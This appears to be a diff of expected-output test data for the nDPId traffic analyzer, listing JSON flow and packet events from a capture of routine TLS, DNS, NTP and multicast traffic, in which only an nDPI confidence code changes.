00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1626168080587,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168080587,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KeAbvRcN5tICOQClAQEAB2rQAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080539,"flow_last_seen":1626168080587,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168080587,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080539,"flow_last_seen":1626168080587,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168080587,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1626168080617,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168080617,"pkt":"8BiYFWV8WNVuaKQACABFAAA0hXNAAG0Gk48ocQovwKgBeQG70p8W6XtBWEUaioAS\/\/+g\/gAAAgQFoAEDAwgBAQQC"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1626168080617,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168080617,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KfAbtYRRqKFul7QlAQEADRvQAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080569,"flow_last_seen":1626168080617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168080617,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080539,"flow_last_seen":1626168080639,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080639,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} -01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080569,"flow_last_seen":1626168080666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080666,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080569,"flow_last_seen":1626168080617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168080617,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080539,"flow_last_seen":1626168080639,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080639,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080569,"flow_last_seen":1626168080666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080666,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080732,"flow_last_seen":1626168080732,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080732,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1626168080732,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168080732,"pkt":"WNVuaKQA8BiYFWV8CABFAABMaD0AAEARB0vAqAF5Ef02+94hAHsAOPLHIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080732,"flow_last_seen":1626168080732,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080732,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} +00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080732,"flow_last_seen":1626168080732,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080732,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1626168080762,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168080762,"pkt":"8BiYFWV8WNVuaKQACABFAABMWKVAADcR3+IR\/Tb7wKgBeQB73iEAOEmOJAED6wAAAAAAAAAOU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mQ0KMdvOSX2ZDQo9j2"} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168081935,"flow_last_seen":1626168081935,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1626168081935,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1626168081935,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1626168081935,"pkt":"8BiYFWV8WNVuaKQACABFAgBT\/jUAADoGG+iC0yGRwKgBeQG70LhXNR5OnF8A9oAYAQrx0QAAAQEICrTFhOw90eMiFwMDABoAAAAAAAAALjbyzjKtkrWGo0S+7wFfhufrwQ=="} -00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168081935,"flow_last_seen":1626168081935,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1626168081935,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168081935,"flow_last_seen":1626168081935,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1626168081935,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1626168081936,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168081936,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAG1D7AqAF5gtMhkdC4AbucXwD2VzUebYAQCAChqQAAAQEICj3SCZ60xYTs"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1626168081936,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1626168081936,"pkt":"WNVuaKQA8BiYFWV8CABFAgBXAABAAEAG1BnAqAF5gtMhkdC4AbucXwD2VzUebYAYCABxCwAAAQEICj3SCZ60xYTsFwMDAB6jdVHReZkUes0n0uJUluEta6fWXjhtBJq5oBbOx1I="} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077441,"flow_last_seen":1626168077507,"flow_idle_time":200000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"}} -00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077620,"flow_last_seen":1626168077673,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2155,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077660,"flow_last_seen":1626168077704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2392,"flow_avg_l4_payload_len":217,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077413,"flow_last_seen":1626168077486,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077619,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168079361,"flow_last_seen":1626168079391,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":50288,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076015,"flow_last_seen":1626168076015,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077441,"flow_last_seen":1626168077507,"flow_idle_time":200000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"}} +00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 